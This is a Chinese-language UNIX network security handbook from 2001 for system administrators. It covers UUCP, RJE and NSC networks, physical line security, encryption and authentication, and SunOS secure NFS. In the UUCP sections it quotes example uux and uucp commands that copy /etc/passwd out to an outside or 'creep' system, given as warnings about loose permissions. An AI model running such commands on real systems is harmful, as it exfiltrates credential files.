[ 永遠的UNIX > 網絡安全手冊 ]

[ 永遠的UNIX::UNIX技術資料的寶庫 ] GB | BIG5

首頁 > 安全技術 > 網絡 > 正文

網絡安全手冊

作者：綠色兵團 (2001-05-01 21:26:03)

    本文主要討論網絡和數據通訊安全,分為六個部分.第一部分概述最大,最老的UNIX網絡UUCP系統;第二部分討論UUCP的安全;第三部分討論新HONEY DANBER UUCP及安全特點;第四部分討論其它的UNIX網絡,其中包括RJE和NSC;第五部分討論通訊的物理安全;最一部分討論Sun Microsystem公司的Sun OS系統的網絡安全.

1.UUCP系統概述
    UUCP系統是一組程序,完成文件傳輸,執行系統之間的命令,維護系統使用情況的統計,保護安全.UUCP是UNIX系統最廣泛使用的網絡實用系統,這其中在兩個原因:第一,UUCP是各種UNIX版本都可用的唯一的標準網絡系統,第二,UUCP是最便宜的網絡系統.只需要一根電纜連接兩個系統,然就可建立UUCP.如果需要在相距數百或數千公裡遠的兩個系統間傳輸數據,中需要兩個具有撥號功能的調制解調器.

(1)UUCP命令
    UUCP命令之一是uucp,該命令用兩系統間的文件傳輸,uucp命令格式類似cp命令的格式,只是uucp允許用戶有系統間拷貝文件,命令的一般格式如下:
uucp source_file destination_file source_file通常是本系統的文件(但不必一定是),destination_file通常是另一系統的文件或目錄.指定destination_file的格式為:
system!filename或system!directory.uucp給系統管理員提供了一個選項,可以限制傳入和傳出本系統的uucp文件只能傳到/usr/spool/uucppublic目錄結構中.若告訴uucp將傳輸的文件存放在其他目錄中,系統將會送回一個郵件:remote access to path / file denied. uucp允許以簡化符號~代替/usr/spool/uucppublic/.如:
uucp names remote!~/john/names
有時也可用uucp將文件從另一個系統拷貝到本系統,只要將要傳入本系統的文件指定為源文件(用system!file)即可,如:uucp remotes!/usr/john/file1 file1
如果在遠地機限制了文件傳輸的目錄,上條命令不能拷貝到文件.拷貝文件到本系統的最安全的方法是:在兩個系統上都通過uucppublic目錄進行文件傳輸:
uucp remotes!~/john/file1 ~/pat/file1

(2)uux命令
    uux命令可用在另一個系統上執行命令,這一特點稱為"遠程命令仞行".uux最通常的用處是在系統之間發送郵件(mail在其內部執行uux).典型的uux請求如下:
pr listing| uux - "remote1!lp -d pr1"
這條命令將文件listing格式編排,再連接到系統remote1的打印機pr1上打印出來.uux的選項"-"使uux將本命令的標準輸入設備建立為遠程命令的標準輸入設備.當若幹個系統中只有一個系統連接了打印機時,常用uux打印文件.
當然必須嚴格地限制遠程命令招待,以保護系統安全.如:本系統不應允許其它系統上的用戶運行下面的命令:uux "yoursys!uucp yoursys!/etc/passwd (outside!~/passwd)"
這條命令將使本系統傳送/etc/passwd文件到系統outside上,一般地,只有幾條命令允許地執行.rmail是加限制的mail程序,常常為允許通過uux執行的命令之一.也允許rnews(加限制的netnews偽脫機命令)在運行netnews的系統上執行,還允許lp在提供了打印設備的系統上運行.
3)uucico程序
    uucp和uux命令實際上並不調用另一個系統及傳送文件和執行命令,而是將用戶的請求排入隊列,並啟動uucico程序.uucico完成實際的通訊工作.它調用其它的系統,登錄,傳送數據(可以是文件或請求遠程命令執行).如果電話線忙,或其它系統已關機,傳輸請求仍針保留在隊列中,uucico續的職能操作(通常是cron完成)將發送這些傳輸請求.uucico完成數據的發送和接收.在本系統的/etc/passwd文件中,有其它系統的uucico登錄進入本系統的入口項,該入口項中指定的缺省shell是uucico.因此,其它系統調用本系統時,直接與uucico對話.

(4)uuxqt程序
    當另一系統的uucico調用本系統請求遠程命令執行時,本系統的uucico將該請求排入隊列,並在退出之前,啟動uuxqt程序執行遠程命令請求.下面舉例說明數據是如何傳輸的.假設本系統的一個用戶發送郵件給另一遠程系統remote1的某人,mail會執行uux,在remote1系統上遠程地運行remail程序,要傳送的郵件為remail命令的輸入.uux將傳輸請求排入隊列,然啟動uucico招待實際的遠程調用和數據傳輸.如果remote1響應請求,uucico登錄到remote1,然傳送兩個文件:郵件和將在remote1上由uuxqt執行的uux命令文件.uux命令文件中含有運行remail請求.如果remote1在被調時已關機,uucico
則將無法登和傳送文件,但是cron會周期地(1小時)啟動uucico.uucico查找是否有還未傳送出的數據,若發現uux指定的傳輸目標系統是remote1,就嘗試再調用remote1,直到調通remote1為止,或者過了一定天數仍未調通remote1,未送出的郵件將作為"不可投遞"的郵件退回給發送該郵件的用戶.
2.UUCP的安全問題
    UUCP系統未設置限制,允許任何本系統外的用戶執行任何命令和拷貝進/出uucp用戶可讀/寫的任何文件.在具體的uucp應用環境中應了解這點,根據需要設置保護.
    在UUCP中,有兩個程序處理安全問題.第一個是uucico程序,該程序在其它系統調用本系統時啟動.這個程序是本系統uucp安全的關鍵,完成本系統文件傳輸的傳進和傳出.第二個程序是uuxqt,該程序為所有的遠程命令執行服務.

(1)USERFILE文件
    uucico用文件/usr/lib/uucp/USERFILE確定遠程系統發送或接收什文件,其格式為:
login,sys[c] path_name [path_name...]
其中login是本系統的登錄名,sys是遠程系統名,c是可選的call_back標志,path_name是目錄名.
    uucico作為登錄shell啟動時,將得到遠程系統名和所在系統的登錄名,並在USERFILE文件中找到匹配login和sys的行.如果該行含有call_back標志c,uucico將不傳送文件,連接斷開,調用遠程系統(即,任何系統可以告訴本系統它的名是xyz,是本系統掛起,調用實際的xyz執行文件傳輸),若無c,uucico將執行遠程系統請求的文件傳送,被傳送的文件名被假定為以path_name開頭的.
用戶需要了解以下幾點:
  . 如果遠程系統使用的登錄名未列USERFILE的登錄域中,uucico將拒絕允許其它系統做任何事,並掛起.. 如果系統名未列sys域中,uucico將使用USERFILE中有匹配的登錄名和空系統名的第一行,如:nuucp,/usr/spool/uucppublic應用到作為nuucp登錄的所有系統.cbuucp,c將迫使作為cbuucp登錄的所有系統自己執行文件傳輸的請求.若調用系統名不匹配sys系統中的任何一個,並且無空入口項,uucico也將拒絕做任何事.
  . 若兩個機器都設置了call_back標志,傳送文件的請求決不會被執行,兩個系統一直互相調用,直到兩個系統中的一個取消call_back時,才能進行文件傳送.
  . 如果一個用戶的登錄名列USERFILE文件的login域中,則當調用本系統的uucico為該用戶傳送文件時,uucico只傳送至path_name指定的目錄中的文件.空登錄名用所有未明確列USERFILE文件中的用戶進行登錄.所以pat,/usr/pat只允許pat傳送/usr/pat目錄結構中的文件.,/usr/spool/uucppublic /tmp其他用戶僅允許傳送目錄/usr/spool/uucppublic和/tmp中的文件.
    不要允許uucico將文件拷進/出到除了/usr/spool/uucppublic目錄以外的其它任何目錄,否則可能會有人用下面的命令拷貝走本系統的重要信息:
uucp yoursys!/etc/passwd to-creep
(2)L.cmds文件
    uuxqt利用/usr/lib/uucp/L.cmds文件確定要執行的遠程執行請求命令.該文件的格式是每行一條命令.如果只需uuxqt處理電子郵件,該文件中就只須一行命令:rmail
系統管理員可允許登錄用戶執行netnews(rnews)的命令或遠程打印命令(lp),但決不能允許用戶執行拷貝文件到標準輸出的命令,如cat命令或網絡命令uucp,否則這些人只需在他們自己的系統上敲入:uux "yoursys!uucp yoursys!/etc/passwd (outside!~/passwd)"然就可等待本系統發送出命令文件.

(3)uucp登錄
    UUCP系統需要兩個登錄戶頭,一個是其它系統登錄的戶頭,另一個是系統管理使用的戶頭.例如,數據傳輸登錄戶頭是nuucp,管理登錄戶頭是uucp,則在/etc/passwd文件中應當有二行.UID和GID的5號通常留給uucp,由uucico具有管理登錄的SUID許可,因此nuucp戶頭的UID和GID應當用其它值.

(4)uucp使用的文件和目錄
    /usr/lib/uucp用存放不能由用戶直接運行的各種uucp,如uuxqt和uucico.該目錄還含有若幹個確定uucp如何操作的文件,如L.cmds和USERFILE.這些文件只能對uucp管理戶頭可寫(系統管理員一定不願讓用戶更改遠程可執行命令表):根據安全的觀點,該目錄中另一個系統管理員必須清楚的文件是L.sys.該文件中含有uucico能調用的每個系統的入口項.入口項數據包括uucico所調用系統的電話號碼,登錄名,未加密的口令.不用說,L.sys應當屬uucp管理戶頭所有,且應當具有400或600存取許可.
    uucp用/usr/spool/uucp目錄存放工作文件.文件名以C.開頭的文件是送到其它系統的命令文件,含有在其它系統上拷入/出數據和執行命令的請求.文件名以D.開頭的文件用作C.文件的數據文件.文件名以X.開頭的文件是來自其它系統的遠程執行請求,由uuxqt解釋.文件名以TM.開始的文件是從其它系統傳送數據到本系統過程中uucp所使用的暫存文件.XQTDIR是uuxqt用執行X.文件的目錄.LOGFILE可有助管理uucp的安全,它含有執行uucp請求成功與否的信息.系統管理員可時常查看該文件,了解有哪些系統正登錄入本系統執行uucp請求?是什請求?特別要檢查這些請求是否試圖做不允許的操作。

其它網絡

(1)遠程作業登錄(RJE)
    RJE(remote job entry)系統提供了一組程序及相應的硬件,允許UNIX系統與IBM主機上的JES(job entry subsystems)通訊.可通過兩條命令的send和usend存取RJE.send命令是RJE的通用的作業提供程序,它將提供文件給JES,就好像這些作業文件是從卡片閱讀機讀入的"穿孔卡片"一樣.usend命令用在使用了RJE系統的UNIX系統間傳送文件,它將建立一個"作業"(虛擬的一疊穿孔卡片),並以send命令的送文件的同樣方式將該作業提供給JES.該作業卡片疊中的控制卡告訴JES數據傳送到何處(這裡,數據是正被傳送的文件).文件傳送的目的地是UNIX系統,但JES認為是一個"行式打印機".RJE系統通常以每秒9600位的速率與JES通訊.典型的usend命令句法如下:
usend -d system -u login file(s)
system是掛到IBM JES上的另一個UNIX系統名,login是另一個系統上的接收用戶的登錄名,file(s)是用戶希望傳送的文件.
幾個關RJE的安全問題:
  . 缺省時,RJE將把文件傳送到接收用戶的HOME目錄中的rje目錄.該目錄必須對其他人可寫,可執行,這意味著存入rje目錄的文件易受到檢查,移動,修改.然而如果該目錄的許可方式是733,其他用戶就不能用ls列目錄內容尋找感興趣的文件.被建立的文件對所有者,小組或其他人都是可讀的,所以通過RJE網絡傳送的安全文件在系統上都是可讀的.為什這些問題不同UUCP和/usr/uucppublic目錄?
* UUCP定期地清除/usr/spool/uucppublic目錄的內容,幾天前或幾星期前的老文件將被刪除,通常用戶將把自己的文件移出uucppublic目錄,以免文件被刪除,而存在用戶rje目錄中的文件不會被清除,所以有些用戶從來不把自己的文件移到其它目錄.
* 用戶清楚地知道uucppublic目錄是一個公共目錄,存入重要信息之前,首先注意將其加密.但是用戶卻總是容易忘記自己rje目錄實際上也是公共目錄,經常忘記將重要文件加密.
  . usend命令在其他人可寫的目錄中建立文件,並重寫其他人可寫的文件.. RJE服務子程序是執行一些功能而不是執行文件傳送.RJE系統像UUCP一樣也執行遠程命令,運行RJE的大多數系統用遠程命令執行轉送電子郵件.因為RJE的傳輸率通常比UUCP更高.遺憾的是RJE沒有像UUCP那樣的能力限制能執行的命令和能存取的文件.一個好的經驗是將連接到同一個JES的一組系統,看作這些系統是在同一系統上.

(2)NSC網絡系統
    NSC(network systems corporation)寬信道網絡是一個高速局域網絡(LAN).NSC可將數千個最遠相距5000英尺的系統掛在一起,傳輸速率可高達50MBIT/S,NSC也可通過的通訊如微波或人造衛星通訊線連接不同系統.UNIX用戶可通過nusend命令存取NSC寬信道,nusend命令的句法與usend命令相同,除用-c選項傳送其他人不可存取的文件外,大多數情況下,nusend的用法與usend是一樣的,換言之,如果無-c選項,文件就是可讀的,而且文件路徑名中列出所有目錄對其他人也都是可搜索的,前邊討論過的關RJE的安全問題的考慮也適合NSC網絡.可查看NSC記錄文件,了解NSC是否正在執行任何不應執行的命令.記錄文件保存在目錄/usr/nsc/log中.下面的命令將打印出所有由NSC在本系統上執
行的命令(rmail除外):
grep execute /usr/nsc/log/LOGFILE|grep -v rmail
5.通訊安全
    有兩種方法可以提供安全的通訊:第一種是保証傳輸介質的物理安全,即使任何人都不可能在傳輸介質上接上自己的竊密線或"竊聽",第二種方法是加密重要數據.

(1)物理安全
    如果所有的系統都鎖在屋裡,並且所有連接系統的網絡和接到系統上的終端都在上鎖的同一屋內,則通訊與系統一樣安全(假定沒有MODEM).但是系統的通訊線在上鎖的室外時,就會發生問題了.
    盡管從網絡通訊線提取信息所需要的技術,比從終端通訊線獲取數據的技術高幾個數量級,上述的同樣的問題也倒發生在網絡連接上.用一種簡單的(但很昂貴)高技術加壓電纜,可以獲得通訊的物理安全.這一技術是若幹年前,為美國國家電話系統而發展的.通訊電纜密封在塑料中,埋置地下,並在線的兩端加壓.線上連接了帶有報警器的監示器,用來測量壓力.如果壓力下降,則意味電纜可能破了,維修人員將被派出尋找與修復出問題的電纜.
    電纜加壓技術提供了安全的通訊線.不是將電纜埋置地下,而是架線整座樓中,每寸電纜都將暴露在外.如果任何人企圖割電纜,監示器會啟動報警器,通知安全保衛人員電纜已被破壞.如果任何人成功地在電纜上接了自己的通訊線,安全人員定期地檢查電纜的總長度,應可以發現電纜拼接處.加壓電纜是屏蔽在波紋鋁鋼包皮中的,因此幾乎沒有電磁發射,如果要用電磁感應竊密,勢必需用大量可見的設備.
    這樣終端就不必鎖在辦公室,而只需將安全電纜的端頭鎖在辦公室的一個盒子裡.
    另一個增加外部終端物理安全的方法,是在每天下午5點使用計算機的時間結束時,即當所有用戶回家時,斷開終端的連接.這樣某人若想非法進入系統,將不得不試圖在白天人們來來回回的時間裡獲取終端的存取權,或不得不在下午5點手試圖潛入計算機房(如果5點計算機房有操作人員或有安全人員,潛入計算機房的企圖就不可能得逞).
    光纖通訊線曾被認為是不可搭線竊聽的,其斷破處立即可被檢測到,拼接處的傳輸會令人難以忍耐的緩慢.光纖沒有電磁幅射,所以也不能用電磁感應竊密.不幸的是光纖的最大長度有限制,長這一長度的光纖系統必須定期地放大(復制)信號.這就需要將信號轉換成電脈沖,然再恢復成光脈沖,繼續通過另一條線傳送.完成這一操作的設備(復制器)是光纖通訊系統的安全薄弱環節,因為信號可能在這一環節被搭線竊聽.有兩個辦法可解決這一問題:距離大最大長度限制的系統間,不要用光纖線通訊(目前,網絡覆蓋范圍半徑約100公裡),或加強復制器的安全(用加壓電纜,警報系統,警衛).
(2)加密
    加密也可提高終端和網絡通訊的物理安全,有三種方法加密傳輸數據:
. 鏈接加密:在網絡節點間加密,在節點間傳輸加密,傳送到節點解密,不同節點對間用不同的密碼.
. 節點加密:與鏈接加密類似,不同的只是當數據在節點間傳送時,不用明碼格式傳送,而是用特殊的加密硬件進行解密和重加密,這種專用硬件通常旋轉在安全保險箱中.
. 首尾加密:對進入網絡的數據加密,然待數據從網絡傳送出再進行解密.網絡本身並不會知道正在傳送的數據是加密數據.這一方法的優點是,網絡上的每個用戶(通常是每個機器的一個用戶)可有不同的加密關鍵詞,並且網絡本身不需增添任何專門的加密設備.缺點是每個系統必須有一個加密設備和相應的軟件(管理加密關鍵詞).或者每個系統必須自己完成加密工作(當數據傳輸率是按兆位/秒的單位計算時,加密任務的計算量是很大的).
    終端數據加密是一特殊情況,此時鏈接加密法和首尾加密法是一樣的方法,終端和計算機都是既為節點又為終止端點.通訊數據加密常常不同文件加密,加密所用的方法不應降低數據的傳送速度.丟失或被歪曲了的數據不應當引起丟失更多的數據位,即解密進程應當能修復壞數據,而不能由壞數據對整個文件或登錄進行不正確地解密.對登錄會話,必須一次加密一個字節,特別是在UNIX系統的情況下,系統要將字所返回給用戶,更應一次加密一個字節.在網絡中,每一鏈可能需要不同的加密關鍵字,這就提出了對加密關鍵詞的管理,分配和替換問題.DES傳送數據的一般形式是以代入法密碼格式按塊傳送數據,不能達到上述的許多要求.DES採用另一加密方法,一次加密一位或一個字節,形成密碼流.
密碼流具有自同步的特點,被傳送的密碼文本中發生的錯誤和數據丟失,將只影響最終的明碼文本的一小段(64位).這稱為密碼反饋.在這種方法中,DES被用作虛擬隨機數發生器,產生出一系列用對明碼文本的隨機數.明碼文本的每n位與一個DESn位的加密輸出數進行異或,n的取值為1-64,DES加密處理的輸入是根據前邊傳送的密碼文本形成的64位的數值.
    發n為1時,加密方法是自同步方式:錯一位或丟失1位,64位的密碼文本將不能被正確地解密,因為不正確的加密值將移入DES輸入的末端.但是一旦接收到正確的64位密碼,由DES的加密和解密的輸入是同步的,故解密將繼續正確地進行.
    DES的初始輸入稱為種子,是一個同時由傳輸器和接收器認可的隨機數.通常種子由一方選擇,在加密前給另一方.而加密關鍵詞不能以明碼格式通過網絡傳送,當加密系統加電時在兩邊都寫入加密關鍵詞,並且在許多階段期間加密關鍵詞都保持不變,用戶可以選擇由主關鍵詞加密的階段關鍵詞,發送到數據傳送的另一端,當該階段結束,階段關鍵詞就不再使用了.主關鍵詞對用戶是不可見的,由系統管理員定期改變,選擇哪一種關鍵詞管理方法,常由所用的硬件來確定.如果加密硬件都有相應的設備,則用種子還是用主關鍵詞階段關鍵詞是無關緊要的.
(3)用戶身份鑒別
    口令只是識別一個用戶的一種方法,實際上有許多方法可以用來識別用戶.. CALL BACK MODEM:則維護系統有效用戶表及其相應電話號碼的設備.當用戶撥號調用系統時,CALL BACK MODEM獲得用戶的登錄戶頭,掛起,再回頭調用用戶的終端.這種方法的優點是,限制只有電話號碼存MODEM中的人才是系統的用戶,從而使非法侵入者不能從其家裡調用系統並登錄,這一方法的缺點是限制了用戶的靈活性,並仍需要使用口令,因為MODEM不能僅從用戶發出調用的地方,唯一地標識用戶.
  . 標記識別:標記是口令的物理實現,許多標記識別系統使用某種形式的卡(如背面有磁條的信用卡),這種卡含有一個編碼的隨機數.卡由連接到終端的閱卡機讀入,不用再敲入口令.為了增加安全性,有的系統要求讀入卡和敲入口令.有些卡的編碼方法使得編碼難復制.標記識別的優點是,標識可以是隨機的並且必須長口令.不足之處是每個用戶必須攜帶一個卡(卡也可與公司的徽記組合使用).並且每個終端上必須連接一個閱讀機.
  . 一次性口令:即"詢問-應答系統".一次性口令系統允許用戶每次登錄時使用不同的口令.這種系統允許用戶每次登錄時使用不同的口令.這種系統使用一種稱做口令發生器的設備,設備是手攜式的(大約為一個袖珍計算器的大小),並有一個加密程序和獨一的內部加密關鍵詞.系統在用戶登錄時給用戶提供一個隨機數,用戶將這個隨機數送入口令發生器,口令發生器用用戶的關鍵詞對隨機數加密,然用戶再將口令發生器輸出的加密口令(回答)送入系統,系統將用戶輸入的口令,與它用相同的加密程序,關鍵詞和隨機數產生的口令比較,如果二者相同,允許用戶存取系統.這種方法的優點是:用戶可每次敲入不同的口令,因此不需要口令保密,唯有口令發生器需要安全保護.為了增加安全性,UNIX系統甚至不需聯機保存關鍵詞,實際的關鍵詞可保存在有線連接系統的一個特殊加密計算機中.在用戶登錄期間,加密計算機將為用戶產生隨機數和加密口令.這樣一種系統的優點是,口令實際不由用戶輸入,系統中也不保存關鍵詞,即使是加密格式的關鍵詞也可保存系統中.其不足之處類似標記識別方法,每個用戶必須攜帶口令發生器,如果要脫機保存關鍵詞,還需要有一個特殊硬件.
  . 個人特征:有些識別系統檢測如指印,簽名,聲音,零售圖案這倦的物理特征.大多數這樣的系統極是實驗性的,昂貴的,並且不是百分之百的可靠.任何一個送數據到遠程系統去核實的系統有被搭線竊
聽的危險,非法入侵者只須記錄下送去系統校核的信息,以再重顯示這些信息,就能竊密.注意:這同樣也是標記識別系統的一個問題.
6.SUN OS系統的網絡安全
    美國SUN MICROSYSTEM公司的SUN OS操作系統是建立在貝爾實驗室的UNIX SYSTEM V和加州大學伯克得分校的UNIX 4.3基礎上的UNIX操作系統.SUN OS 4.0版提供了專門的鑒別系統,該系統極大地提高了網絡環境的安全性.它也可用來確保其它UNIX系統或非UNIX系統的安全.它使用DES密碼機構和公共關鍵字密碼機構來鑒別在網絡中的用戶和機器.DES表示數據編碼標準,而公共數據編碼機構
是包含兩種密鑰的密碼系統:一種是公用的,另一種是專用的.公用的密鑰是公開的而專用密鑰是不公開的.專用(秘密)的密鑰用來對數據進行編碼和解碼.SUN OS系統不同其它公共關鍵字編碼之系統在:SUN OS的公用和專用密鑰都被用來生成一個通用密鑰,該密鑰又用來產生DES密鑰.

(1)確保NFS的安全
    在網絡文件系統NFS上建立安全系統,首先文件系統必須開放並保証裝配的安全.
  . 編輯/etc/exports文件,並將-Secure任選項加在要使用DES編碼機構的文件系統上.在屏幕上顯示服務器怎樣開放安全的/home目錄,如:home -Secure,access=engineering其中engineering是網絡中唯一能存取/home文件系統的用戶組.
  . 對每台客戶機(CLIENT),編輯/etc/fastab文件時,Secure將作為一個裝配任選項出現在每個需要確保安全的文件系統中.
  . SUN OS中包括有/etc/publickey數據庫,該庫對每個用戶均包含有三個域:用戶的網絡名,公用密鑰和編碼的密鑰.當正常安裝時X唯一的用戶是nobody,這個用戶可以無需管理員的幹預即可建立自己的專用密鑰(使用chkey(1)).為了進一步確保安全,管理員可為每個使用newkey(8)的用戶建立一個公用密鑰.
  . 確認keyserv(8c)進程由/etc/rc.local啟動,並且仍在運行.該進程執行對公用密碼的編碼,並將編碼的專用密鑰存入/etc/keystore中.. 此時,所有的用戶(除超級用戶)都必須使用yppasswd來代替passwd,以使得登錄的口令與用戶的密鑰一致.其結果是在網絡中每台客戶機的/etc/passwd文件中不能有每個用戶的用戶名,因而應使用有缺省值的/etc/passwd文件.
  . 當安裝,移動或升級某台機器時,要將/etc/keystore和/etc/.rootkey兩個文件保留.
注意:當你使用login,rlogin或telnet命令到遠程機器時,你會被要求輸入口令.一旦你輸入正確的口令,你也就泄漏了你的帳號.因為此時你的密鑰是存放在/etc/keystore中.當然這是指用戶對遠程機器的安全不信任時.如果用戶覺得遠程機器在安全保密方面不可靠,那就不要登錄到遠程機器去,而可使用NFS來裝配你所查找的文件.
(http://www.fanqiang.com)     進入【UNIX論壇】

相關文章

★ 樊強制作歡迎分享 ★